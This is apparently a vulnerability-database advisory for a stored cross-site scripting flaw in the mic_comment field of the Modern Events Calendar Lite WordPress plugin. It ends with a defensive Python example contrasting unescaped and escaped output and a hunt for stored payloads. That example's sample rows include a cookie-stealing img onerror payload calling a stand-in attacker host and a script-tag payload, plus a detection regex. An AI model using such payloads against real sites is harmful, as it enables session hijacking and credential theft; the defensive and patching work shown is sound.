Modern Events Calendar Lite < 5.16.5 - Authenticated Stored Cross-Site Scripting (XSS)
Description
Unvalidated input and lack of output encoding in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not sanitise the mic_comment field (Notes on time) when adding/editing an event, allowing users with privilege as low as author to add events with a Cross-Site Scripting payload in them, which will be triggered in the frontend when viewing the event.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Authenticated stored XSS in Modern Events Calendar Lite <5.16.5 via unsanitized mic_comment field, triggered when viewing events.
Vulnerability
The Modern Events Calendar Lite WordPress plugin versions before 5.16.5 fail to sanitize the mic_comment (Notes on time) field when creating or editing events. This lack of input validation and output encoding allows users with the Author role (or higher) to inject arbitrary JavaScript into the field. The payload is stored and executed in the front-end when any user views the crafted event [1].
Exploitation
An attacker needs a WordPress account with at least Author-level privileges, enabling them to add or edit events. The attacker inserts a Cross-Site Scripting (XSS) payload into the mic_comment field via the event editor interface; no special network access or user interaction beyond viewing the event is required [1].
Impact
Successful exploitation leads to stored XSS, which can result in session hijacking, credential theft, defacement, or redirection to malicious sites in the context of the victim's browser. The attack compromises the confidentiality and integrity of the WordPress site for any user who views the infected event [1].
Mitigation
The vulnerability is fixed in version 5.16.5, released on January 27, 2021. Update the Modern Events Calendar Lite plugin to version 5.16.5 or later. No workaround is documented in the cited reference. Because exploitation requires an account that can add or edit events, limiting event creation to trusted roles reduces exposure until the update is applied, but it is not a substitute for patching [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- WordPress / Modern Events Calendar Lite
- Range: <5.16.5
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Unvalidated input and lack of output encoding in the mic_comment field allows stored Cross-Site Scripting."
Attack vector
An attacker with author-level privileges (or higher) can create or edit an event and inject a Cross-Site Scripting (XSS) payload into the `mic_comment` field. Because the plugin fails to sanitize this input and does not encode the output, the payload is stored in the database and executed in the victim's browser when any frontend user views the event [ref_id=1]. No special network position is required beyond normal WordPress access.
Affected code
The vulnerability resides in the `mic_comment` field (Notes on time) of the Modern Events Calendar Lite plugin. The plugin did not sanitize this field when adding or editing an event [ref_id=1].
What the fix does
The advisory states that version 5.16.5 fixed the issue [ref_id=1]. No patch diff is provided in the bundle, but the fix presumably adds input sanitization and/or output encoding for the `mic_comment` field to prevent stored XSS. The vendor initially disputed the issue, claiming a role manager plugin should be used, but later released the fix after escalation to the WordPress Plugins Team [ref_id=1].
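The following is an added example, not code from the Modern Events Calendar Lite plugin or from the WPScan advisory. It models the two halves of the bug described above (a free-text field printed into the page verbatim, with neither input sanitisation nor output encoding) beside the hardened pattern, and adds a hunt over rows in the shape of wp_postmeta so a site owner can check whether a payload was stored before the update. Assumptions not taken from the advisory: that the field lands in wp_postmeta under the meta_key "mic_comment", the HTML wrapper it is printed into, and the sample rows, which are constructed.

```python
"""Added example: stored XSS via an unsanitised, unescaped plugin field.

Not the plugin's own code. Assumed, not from the advisory: the meta_key
"mic_comment", the wrapper markup, and the constructed sample rows below.
"""
import html
import re

# Constructed rows in the shape of wp_postmeta (meta_key is an assumption).
SAMPLE_POSTMETA = [
    {"meta_id": 101, "post_id": 42, "meta_key": "mic_comment",
     "meta_value": "Doors open 30 minutes early"},
    {"meta_id": 102, "post_id": 43, "meta_key": "mic_comment",
     "meta_value": '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">'},
    {"meta_id": 103, "post_id": 44, "meta_key": "mic_comment",
     "meta_value": "<script>alert(1)</script>"},
    {"meta_id": 104, "post_id": 44, "meta_key": "_edit_lock",
     "meta_value": "1611700000:5"},
]


def render_notes_vulnerable(notes: str) -> str:
    """Pre-5.16.5 behaviour as the advisory describes it: the stored value is
    interpolated into the event page with no encoding, so any markup in it is
    parsed and executed by the viewer's browser."""
    return f'<div class="mec-time-comment">{notes}</div>'


def sanitize_notes(notes: str) -> str:
    """Input side: strip all tags from a field that is meant to be plain text
    (roughly what WordPress sanitize_text_field() does on save)."""
    return re.sub(r"<[^>]*>", "", notes).strip()


def render_notes_hardened(notes: str) -> str:
    """Output side: HTML-encode at the point of printing (what esc_html() does).
    Sanitising on save alone is not enough; data written by older versions or
    through other paths is already in the database, so output encoding is
    the control that actually neutralises stored payloads."""
    return f'<div class="mec-time-comment">{html.escape(notes, quote=True)}</div>'


# Indicators that a plain-text field holds markup: tags, inline event
# handlers, javascript: URLs, or entity-encoded characters used to evade
# naive filters.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:|&#x?[0-9a-f]+;", re.I)


def hunt_stored_payloads(rows, meta_key="mic_comment"):
    """Return (post_id, meta_id) for rows of the affected field whose value
    contains markup. Run this over a wp_postmeta export after updating."""
    return [(r["post_id"], r["meta_id"]) for r in rows
            if r["meta_key"] == meta_key and SUSPICIOUS.search(r["meta_value"])]


if __name__ == "__main__":
    payload = SAMPLE_POSTMETA[2]["meta_value"]
    print("vulnerable:", render_notes_vulnerable(payload))
    print("hardened:  ", render_notes_hardened(sanitize_notes(payload)))
    print("suspicious rows:", hunt_stored_payloads(SAMPLE_POSTMETA))
```

The hunt is deliberately broad: an inline event handler such as onerror in an img tag is as dangerous as a script tag and is what a practitioner should expect to find, since the field is plain text and should never legitimately contain any markup. Review every hit manually, then clear or re-save the field once the patched version is installed.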
Preconditions
- auth: Attacker must have at least Author-level privileges on the WordPress site
- config: The Modern Events Calendar Lite plugin must be installed and active at a version before 5.16.5
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- wpscan.com/vulnerability/0f9ba284-5d7e-4092-8344-c68316b0146f (MITRE, x_refsource_MISC)
News mentions
No linked articles in our index yet.